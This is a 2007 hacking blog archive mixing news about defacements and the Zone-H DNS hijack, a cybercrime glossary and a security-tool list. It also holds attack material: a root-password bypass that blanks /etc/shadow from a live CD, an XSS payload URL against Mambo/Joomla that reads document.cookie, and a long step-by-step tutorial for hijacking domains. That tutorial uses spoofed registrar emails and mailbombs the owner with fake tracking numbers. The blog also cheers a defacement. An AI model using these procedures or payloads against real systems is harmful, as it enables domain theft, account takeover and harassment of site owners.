January 25, 2007
January 24, 2007
Another .gov.ph Defacements
House of Representatives Official Website
Philippine Children's Medical Center
Zone-H is back!
Have you recently seen a different Zone-H when trying to access our pages? Magic of DNS redirection.It appears that Saudi Arabia crackers managed to get the passwords of our registrar (our registrant panel to be precise), accessed the domain management page and changed the DNS entries, pointing the zone-h domain to an IP address belonging to the crackers on which they mounted the page you saw in the last 48 hours.
48 hours!?! So long it took to take contact with the registrar (they work only through email communication), explain the problem to 8 different people then finally getting a reset of our credentials, taking the domain back in control.
On the funny side, the same problem happened to Google in its German version which yesterday evening was redirected to a different page (different owner actually). In this case (automatic German/English translation) the trick was a bogus domain transfer request that a German provider accepted without explicit authorization from Google Inc. (silence-consense).
What a day! We are so glad we deserve so much of attention.
PS: you will soon find the mirrors in our DB as even though Zone-H wasn't hacked, from the users' point of view it appeared defaced, as only a few users realized they weren't visiting the actual Zone-H server. From the historycal point of view exactly the same incident happened to the Al jazeera sat tv network website, where a hacker managed to trick the registrar to send him the domain control passwords after sending a bogus passport copy during the ID verification process, subsequently changing Al Jazeera's DNS pointing to a different server.
Hacking root password
This is the easiest way to hack root password. This works on most Linux distro.
Boot from a linux 'live cd', I prefer Knoppix STD and edit '/etc/passwd' directly.
boot from a knoppix cdrom:
log into prompt
mkdir /tmp
mount /dev/md2 /tmp => (or appropriate root partition)
vi /tmp/etc/shadow
remove all encrypted md5 text (everything between the first and second colons)
use+ x to delete text)
reboot the system
log in as root with no passwd
change the root passwd with 'passwd
January 23, 2007
Cybercrime Vocabulary
I have tried to put a collection of important terms related to cybercrime, in general. Browse through this list to see how much of these terms you are already familiar with. This may serve as a good background reading, before you take a plunge into the depths of cybercrime.
A
Adware: A program that displays advertising through pop-up or pop-under windows while you are browsing the net.
Algorithm: A procedure or formula that specifies how to solve a problem. In the world of computer programs, this term refers to a particular programming technique.
Anti-spyware software: A computer program that combats spyware.
Anti-virus software: A computer program that combats harmful viruses. Anti-virus software seeks and removes viruses from your computer.
ARPANet: Advanced Research Projects Agency or ARPA was a network that was setup to enable the military and different sections of the government to maintain communications with one another under all circumstances. It became the foundations of what is known today as the World Wide Web.
Attachment (with regard to emails): A file that is sent together with a particular email.
Auction fraud: See Internet auction fraud
Auction sites: Websites that host online auctions, through which potential buyers and merchants interact.
B
Backdoor: An undocumented way of gaining access to a program, a computer system or network. The backdoor is usually implemented by the creator of the program, and is usually only known to him. A backdoor is a potential security risk.
Bandwidth: The bandwidth refers to the rate at which information can be sent through a channel. The greater the bandwidth, the more the information that can be sent in a given amount of time.
Blue Box: A device used to hack into telephone systems.
Brute forcing: Brute forcing involves finding out a solution to a problem in a trial and error way, by trying out all the possible combinations until the correct solution is reached. Such a method is often used to 'crack' passwords. The perpetrator tries all the combinations of the alphabet until he obtains the correct password.
C
Con Artist: Con artists are basically fraudulent characters, who trick or cheat others out of their money or assets.
Copyright infringement: Violation of a person's or an organization's copyright through unauthorized copying or use of a work or other subject matter under copyright.
Cracker: Term used to describe a computer criminal who breaks into or harms computers.
Cracking: Cracking can be defined as modifying a program, to make it behave as you want it to behave and not behave as what its creator had wanted.
Cryptography: A process related to scrambling plaintext (ordinary text, or clear text) into ciphertext (a process called encryption), then back again (known as decryption). The aim here is to protect sensitive information from unauthorized access.
Cyberstalking: Stalking is a series of actions that puts a person in fear for their safety. A stalker may follow you, harass or black mail you. Cyberstalking is the act of stalking, but carried out with the aid of (or through) computers and the Internet.
Cyber punks: The stereotypical image of hackers, they are usually antisocial, socially inept, and burdened with angst directed towards the real world which was unfair to them.
Cyberterrorism: The act of carrying out terrorism using cyberspace, or in other words, the Internet. It is the hacking or attacking of networks and computers to obtain or modify information for political and/or social objectives or rather, a way to quickly and easily distribute propaganda and get a lot of attention drawn to it.
D
Denial-of-Service (DoS) Attack: Repeated attack of a particular network or server until it is too overwhelmed and is brought down.
Disassembler: A cracking utility used by the crackers to reveal the coding of a program.
Dumpster diving: Dumpster diving involves going through your trash bins and garbage to retrieve copies of your checks, credit card or bank statements, or other sensitive records that you have not properly disposed of, e.g. by shredding.
E
Email flooding: The act of sending huge volumes of emails to a single user at any one time.
Encryption: The process of p reventing an unauthorized person from reading or changing a particular data, by protecting the data.
Escrow service: Escrow services act as a trusted third-party during the transaction. They manage the payment process from start to finish, therefore protecting both buyer and seller.
Ethical hacking: Use of hacking knowledge to forcefully attempt to enter a network to find its weaknesses. It is also referred to as 'legalized hacking'.
F
Firewall: An impassable boundary to most Internet traffic. It forms a wall around networks or individual computers protecting them from potential harm.
Fraud: Intentional deception resulting in unlawful gain.
H
Hacking: In the olden days, hacking referred to basically exploring and figuring out how the wired world works. Geeks who did this were called hackers.
However, today, the term is often used to describe computer criminals who break into or harm computers. Purists want those who break into computers to be called as "crackers" rather than "hackers".
Hoax: Something intended to deceive.
Hobbyists: Hobbyists are people who take up cracking just for the pure sake of knowledge.
I
Identity theft: Identity theft occurs when an unscrupulous person obtains enough of your personal information to be able to impersonate you and use your identities to obtain financial gain.
Internet auction fraud: Committing fraud by exploiting the internet auctions held by the many online auction sites, for mainly monetary reasons.
Intrusion detection system (IDS): As its name implies, an IDS detects any intrusion into the system (i.e. an illegal entry attempt by a hacker). An IDS runs in the background and silently monitors the network for any suspicious activity.
IP address: Internet Protocol address, or IP address is a unique number which is assigned to every computer connected to the Internet.
ISP (Internet Service Provider): A company that provides Internet access.
J
Junk email: Unwanted email messages that are forcibly sent to you.
L
Loophole: Flaw or weakness
M
Mainframes: Large and expensive computers historically associated with centralized rather than distributed computing. These computers are capable of supporting hundreds, or even thousands, of users simultaneously.
Malware: Malware or malicious programs are written with the intention of causing various types of damages and nuisances to a computer and the information on the computer.
Multimedia: A generic term to r efer to audio, video, graphics, and images.
N
Network: The term “network” refers to an interconnected system of computers.
Network attack: An attempt to bring down a network in order that it becomes almost totally unusable.
Network intrusion: Network intrusion is unauthorized entry into a network (an interconnected system of computers).
Nigerian letter scam: Another manifestation of the cyber fraud, which tries to rob innocent people of their money. Also known as the "Advance Fee Fraud" or "4-1-9" scheme (named after the relevant section of the Nigerian Criminal Code that it violates).
P
Password crackers: Password crackers concern themselves with cryptography and how to break current encryption techniques.
Pedophile: A person who is sexually attracted to children
Peer-to-Peer (P2P): File swapping systems that allow its users to share files and computing resources.
Phishing: The act of sending faked e-mails to a user that falsely appears to come from a legitimate (and often well-known) business enterprise. This is an attempt to lure unsuspecting email users to divulge their personal data such as account usernames, passwords and credit card numbers on a bogus website.
Phreaker: The perpetrator of phreaking.
Phreaking: The act of breaking into phone networks to make free phone calls.
Piracy: Piracy involves the illegal reproduction and distribution of software applications, games, movies and audio CDs.
Pirates: People who carry out piracy.
Pop-up window: A new internet browser window that appears suddenly, unrequested (by you) on your screen. Commonly used for advertisements.
Protocol: When data is being transmitted between two or more devices, something needs to ensure that these data remain intact. Hence a protocol is implemented, which is basically a set of rules determining the format and transmission of data.
Pyramid schemes: Email messages or messages on the Internet which tell you how, for a relatively small investment, you can make huge amounts of money. The concept and motive is always the same, which is to fool naïve or financially desperate people.
R
Reverse engineering: The process of disassembling a piece of hardware or software to find out how it works.
S
Scam: A fraudulent business scheme aimed to hoodwink an individual or corporation. The perpetrator typically promises his victims a large financial return with little or no risk involved.
Script Kiddies: These are people (usually teenagers) who want to be recognized as dangerous hackers but lack miserably in the required determination and skills. They use ready-made cracking programs (made by others), intending to cause damage to and corrupt systems.
Server: A computer that is dedicated to a particular purpose and which stores all information and does the important functions for that purpose.
Shoulder surfing: Refers to keeping a watch on you as you enter your personal information, such as your password or credit card number or eavesdropping on your personal conversation.
Social engineering: Term used among crackers for exploiting potential weaknesses in people to their advantage, for e.g. hoodwinking someone into giving out sensitive information such as passwords and usernames.
Spamming: Spamming is the act of sending unsolicited messages to many users at a time, possibly up to the thousands, with the usual intention of advertising products to potential customers.
Spyware: A program that gathers information about a person or an organization and sends this information to a third party, often without their permission or knowledge.
Steganography (also called Stego): Steganography is basically hiding information in plain sight. Steganography, is used to hide information in computer files. Information can be generally hidden in various file formats, such as: images, audio files, text files and Word documents.
Superuser: The computer user (account) with the most privilege. The superuser has complete access privileges to all files on the computer.
T
Trojan horse: Trojan horses (or simply Trojans) are computer programs that that disguise themselves to be useful software, but instead they compromise your security and privacy. Trojans can allow hackers to take control of your computer or capture your keystrokes.
U
URL: Abbreviation for Uniform Resource Locator, which refers to the address of a particular website.
Usenet Newsgroups: A system of special interest groups to which readers can post messages. These messages are sent out to other computers on the network.
V
Virus: A virus is a piece of computer code that that hides within other programs or documents so it can spread from computer to computer, infecting as it travels. Viruses can damage your software, your hardware, and your files. Viruses are often written with the intention of replicating themselves.
W
Warez: Refers to commercial software, movies and games that has been modified by a cracker and made freely available to the public on the Internet.
Website Defacement: The act of damaging the appearance of a website.
White Collar Crime: Crimes of theft and deception committed by qualified professionals.
Worm: A worm is a computer program which is programmed to spread from one computer to another maliciously, without any user interaction. Worms do not need to travel through a "host" program or file. They can travel alone and replicate themselves in great volume and slow down computer networks.
Zone-H GOT DEFACED Again!!!
Oh man! This is headline! The well known IT security resource on the planet is not well secured?
Well, zone-h have been dafeced several times. Dec. 21 or Dec. 22 of last year was the most recent.
And now, the latest! It has music... It's everywhere on it's directory.
hahaha!!!
www.zone-h.org are very pissed right now!
I guess zone-h can now add their website to their archive.
January 22, 2007
Persian Mambo V4.6.1 still vulnerable to XSS!!!
I just install the latest Mambo version and run this scripthttp://localhost/mambo/index.php?option=com_content&task=view&id
I also run the script in joomla.
=18&Itemid=39%22%3E<script>alert(document.cookie)</script
>&mosmsg=%3Ch1%3EHi,%20I%20am%20chr1x2%20,%20THIS
%20IS%20XSS%PROBLEM!!!%3C/h1%3E%3Cbr%3E%3Cbr%3E%
3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%
3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3EThey said this is already fixed?
January 9, 2007
Top 15 Security/Hacking Tools & Utilities
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.
Get Nmap Here2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-server framework.
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
3. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.
6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.
7. Ethereal
Ethereal is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Ethereal features that are missing from closed-source sniffers. Screenshot available here. Windows binaries available here.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Ethereal later.
8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.
9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
Get Eraser Here.10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
A good free alternative to L0phtcrack.
LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.
12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco gold).
14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
- Verify that your network is set up the way you intended.
- Find locations with poor coverage in your WLAN.
- Detect other networks that may be causing interference on your network.
- Detect unauthorized “rogue” access points in your workplace.
- Help aim directional antennas for long-haul WLAN links.
- Use it recreationally for WarDriving.
15. hping
To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
January 3, 2007
Domain Stealing or How to Hijack a Domain
Please note this is an old technique again, just for learning purposes, learn how the old techniques worked and why they worked, then try and discover new ways to do things.
SummaryThe sole purpose of the information contained in this advisory is to point out the flaws in InterNIC’s domain name handling system and is intended for educational use only. Since this is public knowledge, it should be also in everyone’s reach.
The technique described below involves an easy to follow procedure of stealing .com/.net/.org/.gov/.mil domain names.This vulnerability has been publicly known for quite a while, and there are ways to prevent it. The procedure below enables an attacker to take over a domain name, enabling him or her to make the arbitrary web address (www.example.com) point to any desired web page on the Internet. This method of domain hijacking is constantly being used to hijack domain names, and to deface web sites.
THIS DOCUMENT SHOULD NOT BE USED FOR ANY ILLEGAL ACTIVITY.Details
Required ingredients:
- Anonymous remailer or mail bomber that can spoof email addresses.
- Social Engineering skills for timing the emails.
- A fake email address at hotmail.com or any other free service.
Exploit:
As an example for this advisory, we will take the domain name example.org. Go to http://www.networksolutions.com and click on the link that says ‘Who Is.’ Now enter the domain name (example.org in this case) in the search field and click on the ‘Search’ button. This would show you the WhoIs information, which will be similar to the one shown below:
Registrant:
Example (ex24-DOM)
Address details
Domain Name: EXAMPLE.ORG
Administrative Contact, Technical Contact, Zone Contact,
Billing Contact:
DOMAIN, ADMIN (ADM001) ADMINEMAIL@EXAMPLE.COM
Record last updated on 00-Jan-2000.
Record created on 00-Jan-2000.
Database last updated on 3-Feb-2000 14:29:53 EST.
Domain servers in listed order:
NS1.EXAMPLE.COM 1.2.3.4
NS2.EXAMPLE.NET 1.2.3.5
Now you have two choices:
1) Either you could take full control of the domain by changing the Administrator’s handle information.
Or
2) You could simply point the domain to another host and let it recover in time by itself.
Initiating the First Attack:
Let us first explain the InterNIC authentication system in case most of you would be the readers who do not have their own domain names. The problem with InterNIC authentication is that they do NOT send a confirmation email if the request is sent from the same email as the person owning the contact or the domain name itself! Therefore, utilizing this flaw one could spoof anyone’s email address and change any domain name’s information.
Although, a confirmation is required from the person to whom the domain is about to be transferred; and that shouldn’t be too hard as it would your own email address.
- Go to http://www.networksolutions.com/
- Click on the link that says ‘Make Changes.’
- Enter the domain name example.org
- You should be presented with 2 blue buttons
- Click on the one that says *Expert*
- Next screen would have a heading ‘Select the form that meets your needs’
- Click on the link that say ‘Contact Form’
- Next you should see a form with 2 fields.
- In the first field enter the admin’s handle (example.org admin is ADM001)
- In the next field enter his/her email address (in this case it’s ADMINEMAIL@EXAMPLE.COM)
- Change the option to ‘Modify.’
- Now ‘Proceed to Contact Information.’
- Select the MAIL-FROM option and click the ‘Go on to Contact Data Information.’
- Now you should see all the information about the admin contact of domain name!
- In the E-mail address field change the email to your own fake email. (in this case it’s evil@domain.com)
- Now ‘Proceed to Set Authorization Scheme.’
- Again choose MAIL-FROM and enter the email address of the admin (ADMINEMAIL@EXAMPLE.COM)
- Leave the bottom option to ‘No’ and ‘Generate Contact Form.’
Now you should see a template with all the information. Similar to this:
******** Please DO NOT REMOVE Version Number ********
Contact Version Number: 1.0
******** Please see attached detailed instructions ********
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO
NOTE: Do NOT press the button at the bottom that says ‘Mail this contact form to me!’
Copy and paste this message into your anonymous remailer or mailbomber and you are ready to go; but WAIT! It’s not that easy, now comes the HARD part! When you mail this message to hostmaster@networksolutions.com a message similar to the following would be sent to the admin email address:
Subject: [NIC-000128.4r50] Your Mail
______________________________________________________________
This is an automatic reply to acknowledge that your message has been received by
hostmaster@networksolutions.com. This acknowledgement is "NOT" a confirmation that your request
has been processed. You will be notified when it has been completed.
If you should have need to correspond with us regarding this request, please include the
tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply
to this message.
If you have not already done so, please come and visit our site via www browser or ftp and
pick-up the latest domain template or review the Domain Name Registration Service Agreement at
the URL's:
Domain Name Registration Service Agreement
http://www.networksolutions.com/legal/service-agreement.html
Domain Name Registration Template
ftp://www.networksolutions.com/templates/domain-template.txt
Regards,
Network Solutions Registration Services
***********************************************
***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service Agreement,
Version 6.0. All versions of the Service Agreement template will continue
to be accepted and processed until January 31, 2000. On and after
February 1, 2000, please use the Network Solutions Service Agreement,
Version 6.0 template located atftp://www.networksolutions.com/templates/domain-template.txt
for all template requests.
The terms and conditions of the Service Agreement are available on our Web site at:
http://www.networksolutions.com/legal/service-agreement.html.
************************************************
The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at
5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times
will be included in that 12-hour zone file update and will normally begin to take effect within
5-6 hours.
Should you wish to modify or delete an existing domain name registration, you can do so online,
using our Service Agreement. You can change the registrant's address, replace a contact/agent
with a different contact/agent, or change primary and/or secondary name server information.
To update information about an existing contact, such as postal address, e-mail address or
telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is
available on our Web site at www.networksolutions.com
To register or update information about a name server, complete and submit the Host Form to
hostmaster@internic.net. This form is also available on our Web site.
Network Solutions Registration Services
e-mail: help@networksolutions.com
You should now be thinking that this message could get you in trouble but there is a way of getting rid of this trouble. Here you’ll use your mailbomber to mailbomb the guy with 20-30 similar messages if you want your attack to be successful. The person would see 35 messages from the same address and therefore would delete all of them and you’d probably be safe. If he ‘would’ email someone then he would probably reply to the wrong tracking number. In the above case, the tracking number is [NIC-000128.4r50]. OK, here another hard part. You have to open your notepad and generate similar numbers actually come up with them.
You should NEVER mailbomb the person with the same tracking number. What we meanis that you should never send more than one emails to him from [NIC-000128.4r50] in the next email, change the [NIC-000128.4r50] to [NIC-000127.5089] or something different. Here is a list of some numbers that we generated just to give you a good idea of how the scheme works.
[NIC-000127.5089][NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]
Remember to change the number at both places. In the subject as well as the email body!
In the case of example.org you will send the email messages to ADMINEMAIL@EXAMPLE.COM from hostmaster@internic.net. The message subject and body are already described above.
Stop after you have mailed him/her 10-15 messages! Now it’s time to email hostmaster@networksolutions.com with our fake email as ADMINEMAIL@EXAMPLE.COM So again, in this case the message will be sent to hostmaster@networksolutions.com from ADMINEMAIL@EXAMPLE.COM with the following template that we created above:
NOTE: Do NOT put anything in the Subject!
******** Please DO NOT REMOVE Version Number ********
Contact Version Number: 1.0
******** Please see attached detailed instructions ********
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: ADM001
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: DOMAIN, ADMIN
1d. Organization Name.......: EXAMPLE
1e. Street Address..........:
1f. City....................:
1g. State...................:
1h. Postal Code.............:
1i. Country.................:
1j. Phone Number............:
1k. Fax Number..............:
1l. E-Mailbox...............: evil@domain.com
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: ADMINEMAIL@EXAMPLE.COM
3c. Public (Y/N)............: NO
Just send one email! DO NOT bomb hostmaster@networksolutions.com with more than one email. That’s pretty much it. Now continue to bomb ADMINEMAIL@EXAMPLE.COM, changing the tracking number every time until your 30-35 tracking numbers are used up!
Now all you have to do is wait. After 24 hours you could go and change the domain information and no one would be there to stop you because now you are the admin of the domain name!
NOTE: This attack will only work on domains that have an admin contact different from their technical contact!
Initiating the Second Attack:
This attack will be successful even if the technical and admin contact are the same. The procedure is basically the same apart from the fact that this time:
- Go to http://www.networksolutions.com/
- Click on the link that says ‘Make Changes.’
- Enter the domain name example.org
- You should be presented with 2 blue buttons
- Click on the one that says *Expert*
- Next screen would have a heading ‘Select the form that meets your needs’
- Click on the link that say ‘Service Agreement.’
- Now when it asks for email address, enter your own.
- Now you should see many fields, don’t panic!
- Go to the technical contact and change the handle to freeservers, hypermart e.t.c.
- Now come to ‘Nameserver Information.’
- Change the nameservers to hypermart or freeserver nameservers.
- If there’s anything in the ‘Optional Information’ after that then simply delete them.
- Click on the button ‘Submit this form for processing.’
You are done, the form will be emailed to your email address. When the form arrives in your email, then simply take this part:
Now launch your anonymous remailer or mailbomber.
**** PLEASE DO NOT REMOVE Version Number or any of the information below when submitting this
template to hostmaster@networksolutions.com. *****
Domain Version Number: 5.0
******** Email completed agreement to hostmaster@networksolutions.com ********
AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s) through our online
application process or by applying for and registering a domain name as part of our e-mail
template application process or by using the service(s) provided by Network Solutions under the
Service Agreement, Version 5.0, you acknowledge that you have read and agree to be bound by all
terms and conditions of this Agreement and any pertinent rules or policies that are or may be
published by Network Solutions.
Please find the Network Solutions Service Agreement, Version 5.0 located at the URL
href="http://www.networksolutions.com/legal/service-agreement.html">
http://www.networksolutions.com/legal/service-agreement.html.
[ URL ftp://www.networksolutions.com ] [11/99]
Authorization
0a. (N)ew (M)odify (D)elete.........: M Name Registration
0b. Auth Scheme.....................: MAIL-FROM
0c. Auth Info.......................:
1. Comments........................:
2. Complete Domain Name............: example.org
Organization Using Domain Name
3a. Organization Name................: EXAMPLE
3b. Street Address..................:
3c. City............................:
3d. State...........................:
3e. Postal Code.....................:
3f. Country.........................:
Administrative Contact
4a. NIC Handle (if known)...........: ADM001
4b. (I)ndividual (R)ole?............: Individual
4c. Name (Last, First)..............:
4d. Organization Name...............:
4e. Street Address..................:
4f. City............................:
4g. State...........................:
4h. Postal Code.....................:
4i. Country.........................:
4j. Phone Number....................:
4k. Fax Number......................:
4l. E-Mailbox.......................:
Technical Contact
5a. NIC Handle (if known)...........: BDM002
5b. (I)ndividual (R)ole?............: Individual
5c. Name(Last, First)...............:
5d. Organization Name...............:
5e. Street Address..................:
5f. City............................:
5g. State...........................:
5h. Postal Code.....................:
5i. Country.........................:
5j. Phone Number....................:
5k. Fax Number......................:
5l. E-Mailbox.......................:
Billing Contact
6a. NIC Handle (if known)...........: ADM001
6b. (I)ndividual (R)ole?............: Individual
6c. Name (Last, First)..............:
6d. Organization Name...............:
6e. Street Address..................:
6f. City............................:
6g. State...........................:
6h. Postal Code.....................:
6i. Country.........................:
6j. Phone Number....................:
6k. Fax Number......................:
6l. E-Mailbox.......................:
Prime Name Server
7a. Primary Server Hostname.........: NS1.EXAMPLE.COM
7b. Primary Server Netaddress.......: 1.2.3.4
Secondary Name Server(s)
8a. Secondary Server Hostname.......: NS2.EXAMPLE.NET
8b. Secondary Server Netaddress.....: 1.2.3.5
END OF AGREEMENT
For instructions, please refer to:
"http://www.networksolutions.com/help/inst-mod.html"
- From: the domain admin (ADMINEMAIL@EXAMPLE.COM in this case).
- To: hostmaster@networksolutions.com
- Subject: (do not enter any subject, leave the field blank!)
- Body: the template you created above.
- You are ready to go but before you send this email to InterNIC, remember to bomb ADMINEMAIL@EXAMPLE.COM with similar emails but different tracking numbers as we did in the first procedure.
- After sending 10-20 emails, send the above template to InterNIC.
- Continue bombing your 40 messages. Remember to generate 40-50 tracking numbers.
This is basically it. - The domain would be transferred to freeservers or hypermart and then you could simply activate it from there on your own email address. Remember to use a fake email.
Nameservers and Handles:
Freeservers Technical Handle: FS4394Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154
Hypermart Technical Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66
______________________________________________________________
Possible Fixes:
Enable the CRYPT-FW password mechanism. This should prevent anyone without this password from changing your domain information (see the Internic contact form for more information).
eEye Launches 0-Day Exploit Tracker
Ah finally a decent 0-day exploit tracker, one that isn’t underground and could be fairly useful to everyone.
0-day as basically stated in the article is an exploit not known publicly or available publicly well before any patches are available, some private groups often have exploits for a year or more before someone else discovers them, makes them public and they inevitably get fixed.
Like the famous remote exploit in Windows RPC, private groups had that for almost 2 years before it became public.
Scary eh?
It’s a good idea even if it’s not an industry effort it’s solely an eEye effort, I’m glad someone has done it and eEye has a strong capable team, so it should be fairly relevant if it’s kept up to date.Security firm eEye has created what’s described as the industry’s first site designed solely to track zero-day vulnerabilities, flaws where exploits are available prior to the release of security patches.
eEye’s zero-day tracking site provides detailed information on flaws and remediation strategies to users. The site will be maintained by security researchers at eEye Research, who have a track record of unearthing new security bugs, and is essentially an eEye gig rather than a cross-industry effort.
However, eEye invites other interested parties to contribute suggestions on flaws that merit inclusion on its list. eEye said it created the site, which includes information on how long flaws have remained unfixed, in response to the growing number of zero-day exploits.
In other security tracking news, security notification firm Secunia has released a tool designed to determine insecure versions of popular software packages (such as browsers, IM clients, and media players) on consumer’s PC.
Secunia’s Software Inspector provides users with advice on what to do if they are running insecure software packages.
Both eEye zero-day tracking site and Secunia’s Software Inspector are available free of charge.
You can find the site here:eEye Zero Day Tracker
Source: The Register
Subscribe to:
Posts (Atom)
